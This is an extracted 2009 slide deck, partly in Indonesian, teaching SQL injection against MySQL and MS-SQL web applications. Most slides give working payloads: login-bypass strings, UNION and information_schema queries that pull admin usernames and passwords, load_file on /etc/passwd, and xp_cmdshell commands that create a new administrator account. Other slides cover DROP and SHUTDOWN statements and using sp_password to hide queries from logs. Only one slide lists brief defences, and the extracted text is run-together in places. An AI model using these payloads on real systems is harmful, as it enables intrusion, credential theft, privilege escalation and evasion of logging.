8/11/2019 SQL Injection Slide
1/16
by : nazRuL [at] delaforta.net
27 maret 2009
8/11/2019 SQL Injection Slide
2/16
Introduction
SQL INJECTION
SQL injection is a code injection technique that exploits a
security vulnerability occurring in the database layer of anapplication. The vulnerability is present when user input iseither incorrectly filtered for string literal escape charactersembedded in SQL statements or user input is not stronglytyped and thereby unexpectedly executed.
8/11/2019 SQL Injection Slide
3/16
Simple Concept
or 1=1--
or =
' or 1=1#
') or '1'='1--
' or 1=1/*
admin'/*
etc.....
8/11/2019 SQL Injection Slide
4/16
MySQL Injection
1. Input yang tak tervalidasi
2. Penambahan tanda petik ()
3. Pengujian dengan Query AND
8/11/2019 SQL Injection Slide
5/16
INJECTION...
CARI JUMLAH TABEL
=> ORDER BY
CARI LETAK KOLOM=> UNION SELECT
CARI NAMA TABLE
> information.schema> limit
> group_concat
8/11/2019 SQL Injection Slide
6/16
INJECTION (Continue...)
CARI NAMA KOLOM
> information.schema
> table_name == hexa_string> limit
> group_concat
* Lets Get the XxX..
8/11/2019 SQL Injection Slide
7/16
THE SECRET
DIBALIK
table information .schema
8/11/2019 SQL Injection Slide
8/16
* Magic Query.:. load_file(/path/file);
ex : /etc/passwd.:. into dumpfile (/path/fle);
Ex : /tmp/blabla >perm 777
/path/yang/diketahui/
Adavanced...
8/11/2019 SQL Injection Slide
9/16
MS-SQL Injection
1. Input yang tak tervalidasi
2. Penambahan tanda petik ()
3. Pengujian dengan Query AND
8/11/2019 SQL Injection Slide
10/16
INJECTION...
Mencari nama-nama tabel
=> having 1=1--
(memanfaatkan error Query SQL)
Memanfaatkan query group by
=> (group by table,table having 1=1--)
8/11/2019 SQL Injection Slide
11/16
INJECTION...
DATA MANIPULATION
* UPDATE
(updatetable_name setcolumn2 wherecolumn1=n)
* INSERT
(insert into table_name values(n,isi)* DROP (drop table table_name)
* SHUTDOWN
8/11/2019 SQL Injection Slide
12/16
*Magic Query
.:. Check status user
convert(int,(select+user));--
.:. CMD SheLL queryf
-* exec+master..xp_cmdshell net userunamepass/add
* exec+master..xp_cmdshell net localgroup administartor uname/add
Adavanced...
8/11/2019 SQL Injection Slide
13/16
Pencegahan
- PHP based1. Convert all to Int
2. Magic quotes Off
3.
4. addslashes function
- ASP based
1. Replace to
2. SQL Error Handling
8/11/2019 SQL Injection Slide
14/16
Blind-SQL Injection
Pengertian....
8/11/2019 SQL Injection Slide
15/16
Blind-SQL
# Pencarian table_admin, username ataupun passowrd #
UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES
=> WHERE+table_name+NOT+IN+(table_yg_muncul)
UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=table_yg_diinginkan=> WHERE+table_name='user'+AND+ column_name+NOT+IN+(column_yg_muncul)
UNION+SELECT+1,2,user,pass,4+FROM+table_admin
8/11/2019 SQL Injection Slide
16/16
# Tips
# Mengunakan Concatenationuntuk menampilkan field dengan banyak column_name
ID+:+username+:+userpass
(ID%2B':'%2Busername%2B':'%2Buserpass)
# Menggunakan --sp_passwordsp_password berfungsi agar mssql tidak melakukan logs query pada
mssql ( kemungkinan hanya terlog pada server)> sering di temui pada web aplication: asp,cfm,aspx, etc..
Top Related